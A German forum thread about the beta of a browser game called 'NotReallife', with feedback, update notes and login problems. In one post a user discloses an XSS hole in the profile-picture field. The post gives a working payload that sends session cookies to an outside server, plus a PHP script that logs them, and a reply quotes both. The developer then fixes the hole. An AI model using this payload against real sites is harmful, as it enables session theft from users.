NotReallife - Browsergame

opfer200000000 · 04/16/2014, 22:19

Grad ein wenig angetestet, als Verbesserung hätte ich, dass Aktionsmenü ist relativ verwirrend wenn es oben links ist. Würde dieses Eventuell anders platzieren.

adistoe · 04/16/2014, 22:46

Hättest du da auch ein Vorschlag wie platzieren?
Oder lieber ganz entfernen?

Selfo# · 04/16/2014, 22:50

Hey,

ich finde die Idee echt gut!
Allerdings könntest du vielleicht ein paar Screens auf der Homeseite stellen, dass regt mehr Leute an.
Ansonsten noch viel Glück!

Liebe Grüße,
Selfo

adistoe · 04/16/2014, 22:57

Danke für das Feedback

Das mit den Screens ist eigentlich eine gute Idee, werde ich mir mal anschauen

Aber dafür müsste vielleicht noch etwas mehr Farbe ins Game kommen, damit die Screens auch was hergeben

An den Spassvogel, der sich im Game "hurensohn36" nannte und mir eine PN mit Betreff "*********" und Nachricht "ich ficke dich" geschrieben hat:
Schön, dass du Freude an sowas hast...

adistoe · 04/19/2014, 16:18

//Update:

19.04.2014 [6.0.0c BETA]
Verschiedene kleinere Bugfixes.

adistoe · 05/05/2014, 22:20

//Update:

05.05.2014 [6.0.1a BETA]
Teammitglieder ab Supporter werden nun nicht mehr in der Rangliste angezeigt (Nur noch bei Usersuche).
Das Actionmenu wurde rausgepatcht.
Einige Bugfixes.

PaySafeGuy™ · 05/06/2014, 23:06

Ich kann mich nicht mit meiner @gmail.com e-mail anmelden :/

adistoe · 05/07/2014, 12:55

Gibt es eine Fehlermeldung?
Bzw. kommt folgende Meldung: "Bitte geben Sie eine existierende E-Mail-Adresse ein!"

~~Rainbow'~~ · 05/07/2014, 20:49

Bei mir funktioniert die Registration leider nicht :/

adistoe · 05/08/2014, 19:11

Welche Fehler werden ausgegeben?

#edit: Habe eben die Registrierung etwas bearbeitet, müsste eig. jetzt funktionieren

~~supercracker13~~ · 05/14/2014, 19:30

Kleiner hinweis deine Website lässt sich durch XSS leicht angreifen. Also jedenfalls die User der Seite.
Die Schwachstelle ist dort wo man den link für das profilfoto eintragen muss.

Trägt man dort folgendes ein:

PHP Code:


			
"></img><script> var theimg=document.createElement("img"),  session=document.cookie, url="http://website.com/code.php?a=" + session; theimg.src=url; document.body.appendChild(theimg); theimg.style.display="none"; </script><img src="

Muss man nur ein Script erstellen das folgender maßen aussieht und code.php heißt:

PHP Code:


			
<?php
$currcode = $_GET["a"];
$daten = $currcode . "\n";
$datei_name = "data.txt";
$fp = fopen($datei_name, "a+");
fwrite($fp, $daten);
fclose($fp);
?>

Und schon wird von jedem der die Rangliste aufruft die Session in eine Datei geschrieben die auf einem fremden Server liegt. Kenne mich nicht so gut damit aus, daher kenne ich nur diese Methode.

Ich hoffe du änderst da noch was dran

~~IchVerabschiedeMich~~ · 05/15/2014, 01:32

Quote:

Originally Posted by supercracker13

Kleiner hinweis deine Website lässt sich durch XSS leicht angreifen. Also jedenfalls die User der Seite.
Die Schwachstelle ist dort wo man den link für das profilfoto eintragen muss.

Trägt man dort folgendes ein:

PHP Code:

"></img><script> var theimg=document.createElement("img"), session=document.cookie, url="http://website.com/code.php?a=" + session; theimg.src=url; document.body.appendChild(theimg); theimg.style.display="none"; </script><img src="

Muss man nur ein Script erstellen das folgender maßen aussieht und code.php heißt:

PHP Code:

<?php $currcode = $_GET["a"]; $daten = $currcode . "\n"; $datei_name = "data.txt"; $fp = fopen($datei_name, "a+"); fwrite($fp, $daten); fclose($fp); ?>

Und schon wird von jedem der die Rangliste aufruft die Session in eine Datei geschrieben die auf einem fremden Server liegt. Kenne mich nicht so gut damit aus, daher kenne ich nur diese Methode.

Ich hoffe du änderst da noch was dran

Es hätte auch gereicht ihn auf die XSS hinzuweisen

~~supercracker13~~ · 05/15/2014, 11:03

Quote:

Originally Posted by Padrio

Es hätte auch gereicht ihn auf die XSS hinzuweisen

Ok, sry

Wollte ihm nur zeigen was er möglichst blocken sollte, weil ein paar Sachen waren bereits geblockt

~~IchVerabschiedeMich~~ · 05/15/2014, 13:43

Quote:

Originally Posted by supercracker13

Ok, sry

Wollte ihm nur zeigen was er möglichst blocken sollte, weil ein paar Sachen waren bereits geblockt

Hatte ja auch bereits eine gesamte Auflistung für ihn gemacht

Und Privat auch noch paar Sachen gesendet.

adistoe · 05/15/2014, 18:49

Die Usergaben sind grösstenteils gesichert, leider nicht alle, wie es scheint

Die Profilbildeingabe habe ich vor geraumer Zeit nach einem XSS mit einer Weiterleitung gesichert, muss ich anscheinend verkackt haben oder bei einem Update versehentlich rausgepatcht haben

Danke jedenfalls für den Hinweis

Lediglich der Hinweis auf XSS im Profilbild hätte wirklich gereicht, trotzdem danke

Und Padrio, durch dich... So viele Fehler gefunden und gefixt

#edit:

//Update
15.05.2014 [6.0.1b BETA]
Kleinere Bugfixes